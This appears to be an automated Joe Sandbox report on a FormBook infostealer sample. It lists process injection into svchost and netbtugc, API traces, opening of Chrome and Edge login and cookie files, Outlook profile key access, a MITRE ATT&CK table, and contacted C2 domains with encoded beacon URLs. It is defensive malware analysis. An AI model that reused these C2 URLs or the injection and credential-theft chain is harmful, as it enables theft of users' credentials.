Source: C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe	NtDeviceIoControlFile: Direct from: 0x77462AEC	Jump to behavior
Source: C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe	NtOpenSection: Direct from: 0x77462E0C	Jump to behavior
Source: C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe	NtCreateFile: Direct from: 0x77462FEC	Jump to behavior
Source: C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe	NtOpenFile: Direct from: 0x77462DCC	Jump to behavior
Source: C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe	NtQueryInformationToken: Direct from: 0x77462CAC	Jump to behavior
Source: C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe	NtTerminateThread: Direct from: 0x77462FCC	Jump to behavior
Source: C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe	NtAllocateVirtualMemory: Direct from: 0x77462BEC	Jump to behavior
Source: C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe	NtOpenKeyEx: Direct from: 0x77462B9C	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\WBI835q8qr.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\netbtugc.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: NULL target: C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: NULL target: C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\netbtugc.exe

Thread register set: target process: 6896

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\netbtugc.exe

Thread APC queued: target process: C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\WBI835q8qr.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 2DEC008

Jump to behavior

Source: C:\Users\user\Desktop\WBI835q8qr.exe

Code function: 0_2_00B787B1 LogonUserW,

0_2_00B787B1

Source: C:\Users\user\Desktop\WBI835q8qr.exe

Code function: 0_2_00B23B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00B23B3A

Source: C:\Users\user\Desktop\WBI835q8qr.exe

Code function: 0_2_00B248D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

0_2_00B248D7

Source: C:\Users\user\Desktop\WBI835q8qr.exe

Code function: 0_2_00B84C27 mouse_event,

0_2_00B84C27

Source: C:\Users\user\Desktop\WBI835q8qr.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\WBI835q8qr.exe"	Jump to behavior
Source: C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe	Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\WBI835q8qr.exe

Code function: 0_2_00B77CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_00B77CAF

Source: C:\Users\user\Desktop\WBI835q8qr.exe

Code function: 0_2_00B7874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_00B7874B

Source: WBI835q8qr.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: WBI835q8qr.exe, zERAQEwgaCWL.exe, 00000003.00000000.1494048666.0000000001C30000.00000002.00000001.00040000.00000000.sdmp, zERAQEwgaCWL.exe, 00000003.00000002.3855440371.0000000001C31000.00000002.00000001.00040000.00000000.sdmp, zERAQEwgaCWL.exe, 00000008.00000000.1637193636.0000000000FC1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: zERAQEwgaCWL.exe, 00000003.00000000.1494048666.0000000001C30000.00000002.00000001.00040000.00000000.sdmp, zERAQEwgaCWL.exe, 00000003.00000002.3855440371.0000000001C31000.00000002.00000001.00040000.00000000.sdmp, zERAQEwgaCWL.exe, 00000008.00000000.1637193636.0000000000FC1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: zERAQEwgaCWL.exe, 00000003.00000000.1494048666.0000000001C30000.00000002.00000001.00040000.00000000.sdmp, zERAQEwgaCWL.exe, 00000003.00000002.3855440371.0000000001C31000.00000002.00000001.00040000.00000000.sdmp, zERAQEwgaCWL.exe, 00000008.00000000.1637193636.0000000000FC1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: 0Program Manager
Source: zERAQEwgaCWL.exe, 00000003.00000000.1494048666.0000000001C30000.00000002.00000001.00040000.00000000.sdmp, zERAQEwgaCWL.exe, 00000003.00000002.3855440371.0000000001C31000.00000002.00000001.00040000.00000000.sdmp, zERAQEwgaCWL.exe, 00000008.00000000.1637193636.0000000000FC1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\WBI835q8qr.exe

Code function: 0_2_00B4862B cpuid

0_2_00B4862B

Source: C:\Users\user\Desktop\WBI835q8qr.exe

Code function: 0_2_00B54E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00B54E87

Source: C:\Users\user\Desktop\WBI835q8qr.exe

Code function: 0_2_00B61E06 GetUserNameW,

0_2_00B61E06

Source: C:\Users\user\Desktop\WBI835q8qr.exe

Code function: 0_2_00B53F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_00B53F3A

Source: C:\Users\user\Desktop\WBI835q8qr.exe

Code function: 0_2_00B249A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00B249A0

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.3856343827.0000000003090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3848509513.0000000000CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1567281464.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3855901361.0000000003240000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3859655082.0000000004E10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3856117631.0000000003050000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1568187338.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1567707213.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\netbtugc.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Source: WBI835q8qr.exe	Binary or memory string: WIN_81
Source: WBI835q8qr.exe	Binary or memory string: WIN_XP
Source: WBI835q8qr.exe	Binary or memory string: WIN_XPe
Source: WBI835q8qr.exe	Binary or memory string: WIN_VISTA
Source: WBI835q8qr.exe	Binary or memory string: WIN_7
Source: WBI835q8qr.exe	Binary or memory string: WIN_8
Source: WBI835q8qr.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.3856343827.0000000003090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3848509513.0000000000CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1567281464.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3855901361.0000000003240000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3859655082.0000000004E10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3856117631.0000000003050000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1568187338.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1567707213.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\WBI835q8qr.exe	Code function: 0_2_00B96283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		0_2_00B96283
Source: C:\Users\user\Desktop\WBI835q8qr.exe	Code function: 0_2_00B96747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_00B96747

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	1 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Valid Accounts	3 Obfuscated Files or Information	NTDS	116 System Information Discovery	Distributed Component Object Model	21 Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	251 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	412 Process Injection	2 Valid Accounts	Cached Domain Credentials	2 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	412 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
WBI835q8qr.exe	69%	Virustotal		Browse
WBI835q8qr.exe	74%	ReversingLabs	Win32.Backdoor.FormBook
WBI835q8qr.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://www.3xfootball.com/fo8o/?7Fp=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOn1aOjYc66J7Y/iHKqqtd6zR7stgJ4hm8X7oMbvduFmUyU2g==&HN4=EPU0u4nHA	0%	Avira URL Cloud	safe
http://www.goldenjade-travel.com/fo8o/?7Fp=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaF2yArpDgvi6oTdq6vPucKXgoaIsT3InbTvvq+zcnCyLgXuQ==&HN4=EPU0u4nHA	100%	Avira URL Cloud	malware
http://www.rssnewscast.com/fo8o/?7Fp=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNup0fu2K1aHG/1RRjejs3ag7ONVYGhhFLwGMDRFljOPFYJw==&HN4=EPU0u4nHA	100%	Avira URL Cloud	malware
http://www.elettrosistemista.zip/fo8o/?7Fp=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMLyJvXbOnx1XXjd4sQOb9JZJsSiXIk2nToiXJsgHURydTcQ==&HN4=EPU0u4nHA	100%	Avira URL Cloud	malware
https://www.empowermedeco.com/fo8o/?7Fp=mxnR	0%	Avira URL Cloud	safe
http://www.techchains.info/fo8o/	100%	Avira URL Cloud	malware
http://www.magmadokum.com/fo8o/?7Fp=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjKEsqfuFkq5cAQSWi7WA8E0wwXs8UZjiSCj3RZ8cyRYh4cA==&HN4=EPU0u4nHA	0%	Avira URL Cloud	safe
http://www.empowermedeco.com	0%	Avira URL Cloud	safe
http://www.empowermedeco.com/fo8o/?7Fp=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKfAZWzpPAGosIZrfQfUSvJErRFr5z6zwQDc//Mk8r+NzcRQ==&HN4=EPU0u4nHA	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
elettrosistemista.zip	195.110.124.133	true	false	high
empowermedeco.com	217.196.55.202	true	false	high
www.3xfootball.com	154.215.72.110	true	false	high
www.goldenjade-travel.com	116.50.37.244	true	false	high
www.rssnewscast.com	91.195.240.94	true	false	high
www.techchains.info	66.29.149.46	true	false	high
natroredirect.natrocdn.com	85.159.66.93	true	false	high
www.magmadokum.com	unknown	unknown	true	unknown
www.donnavariedades.com	unknown	unknown	false	high
www.660danm.top	unknown	unknown	true	unknown
www.joyesi.xyz	unknown	unknown	false	high
www.liangyuen528.com	unknown	unknown	true	unknown
www.kasegitai.tokyo	unknown	unknown	true	unknown
www.empowermedeco.com	unknown	unknown	false	high
www.k9vyp11no3.cfd	unknown	unknown	true	unknown
www.elettrosistemista.zip	unknown	unknown	false	high
www.shenzhoucui.com	unknown	unknown	true	unknown
www.antonio-vivaldi.mobi	unknown	unknown	true	unknown
www.b301.space	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.3xfootball.com/fo8o/?7Fp=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOn1aOjYc66J7Y/iHKqqtd6zR7stgJ4hm8X7oMbvduFmUyU2g==&HN4=EPU0u4nHA	true	Avira URL Cloud: safe	unknown
http://www.goldenjade-travel.com/fo8o/?7Fp=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaF2yArpDgvi6oTdq6vPucKXgoaIsT3InbTvvq+zcnCyLgXuQ==&HN4=EPU0u4nHA	true	Avira URL Cloud: malware	unknown
http://www.empowermedeco.com/fo8o/	false		high
http://www.rssnewscast.com/fo8o/?7Fp=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNup0fu2K1aHG/1RRjejs3ag7ONVYGhhFLwGMDRFljOPFYJw==&HN4=EPU0u4nHA	true	Avira URL Cloud: malware	unknown
http://www.elettrosistemista.zip/fo8o/	false		high
http://www.magmadokum.com/fo8o/	false		high
http://www.rssnewscast.com/fo8o/	false		high
http://www.empowermedeco.com/fo8o/?7Fp=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKfAZWzpPAGosIZrfQfUSvJErRFr5z6zwQDc//Mk8r+NzcRQ==&HN4=EPU0u4nHA	true	Avira URL Cloud: safe	unknown
http://www.magmadokum.com/fo8o/?7Fp=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjKEsqfuFkq5cAQSWi7WA8E0wwXs8UZjiSCj3RZ8cyRYh4cA==&HN4=EPU0u4nHA	true	Avira URL Cloud: safe	unknown
http://www.elettrosistemista.zip/fo8o/?7Fp=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMLyJvXbOnx1XXjd4sQOb9JZJsSiXIk2nToiXJsgHURydTcQ==&HN4=EPU0u4nHA	true	Avira URL Cloud: malware	unknown
http://www.goldenjade-travel.com/fo8o/	false		high
http://www.techchains.info/fo8o/	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	netbtugc.exe, 00000004.00000003.1751700157.0000000007DB8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	netbtugc.exe, 00000004.00000003.1751700157.0000000007DB8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	netbtugc.exe, 00000004.00000003.1751700157.0000000007DB8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	netbtugc.exe, 00000004.00000003.1751700157.0000000007DB8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	netbtugc.exe, 00000004.00000003.1751700157.0000000007DB8000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.empowermedeco.com	zERAQEwgaCWL.exe, 00000008.00000002.3859655082.0000000004EBD000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	netbtugc.exe, 00000004.00000003.1751700157.0000000007DB8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_	netbtugc.exe, 00000004.00000002.3861080455.00000000062C0000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3859184553.000000000462E000.00000004.10000000.00040000.00000000.sdmp, zERAQEwgaCWL.exe, 00000008.00000002.3857301364.000000000359E000.00000004.00000001.00040000.00000000.sdmp	false		high
https://www.sedo.com/services/parking.php3	zERAQEwgaCWL.exe, 00000008.00000002.3857301364.000000000359E000.00000004.00000001.00040000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	netbtugc.exe, 00000004.00000003.1751700157.0000000007DB8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://codepen.io/uzcho_/pens/popular/?grid_type=list	netbtugc.exe, 00000004.00000002.3859184553.0000000004952000.00000004.10000000.00040000.00000000.sdmp, zERAQEwgaCWL.exe, 00000008.00000002.3857301364.00000000038C2000.00000004.00000001.00040000.00000000.sdmp	false		high
https://codepen.io/uzcho_/pen/eYdmdXw.css	netbtugc.exe, 00000004.00000002.3859184553.0000000004952000.00000004.10000000.00040000.00000000.sdmp, zERAQEwgaCWL.exe, 00000008.00000002.3857301364.00000000038C2000.00000004.00000001.00040000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	netbtugc.exe, 00000004.00000003.1751700157.0000000007DB8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.empowermedeco.com/fo8o/?7Fp=mxnR	netbtugc.exe, 00000004.00000002.3859184553.0000000004F9A000.00000004.10000000.00040000.00000000.sdmp, zERAQEwgaCWL.exe, 00000008.00000002.3857301364.0000000003F0A000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	netbtugc.exe, 00000004.00000003.1751700157.0000000007DB8000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
91.195.240.94	www.rssnewscast.com	Germany	47846	SEDO-ASDE	false
154.215.72.110	www.3xfootball.com	Seychelles	132839	POWERLINE-AS-APPOWERLINEDATACENTERHK	false
195.110.124.133	elettrosistemista.zip	Italy	39729	REGISTER-ASIT	false
116.50.37.244	www.goldenjade-travel.com	Taiwan; Republic of China (ROC)	18046	DONGFONG-TWDongFongTechnologyCoLtdTW	false
85.159.66.93	natroredirect.natrocdn.com	Turkey	34619	CIZGITR	false
66.29.149.46	www.techchains.info	United States	19538	ADVANTAGECOMUS	false
217.196.55.202	empowermedeco.com	Norway	29300	AS-DIRECTCONNECTNO	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1588679
Start date and time:	2025-01-11 04:04:30 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 26s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	WBI835q8qr.exe renamed because original name is a hash value
Original Sample Name:	075cbf8b84def7244b1e0b5e759b7ac367a015c40a2d127c730cfb5f39c5a040.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/3@18/7
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 96% Number of executed functions: 49 Number of non-executed functions: 276
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 4.245.163.56
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target zERAQEwgaCWL.exe, PID 4612 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
22:06:17	API Interceptor	9822787x Sleep call for process: netbtugc.exe modified

Joe Sandbox View / Context

IPs

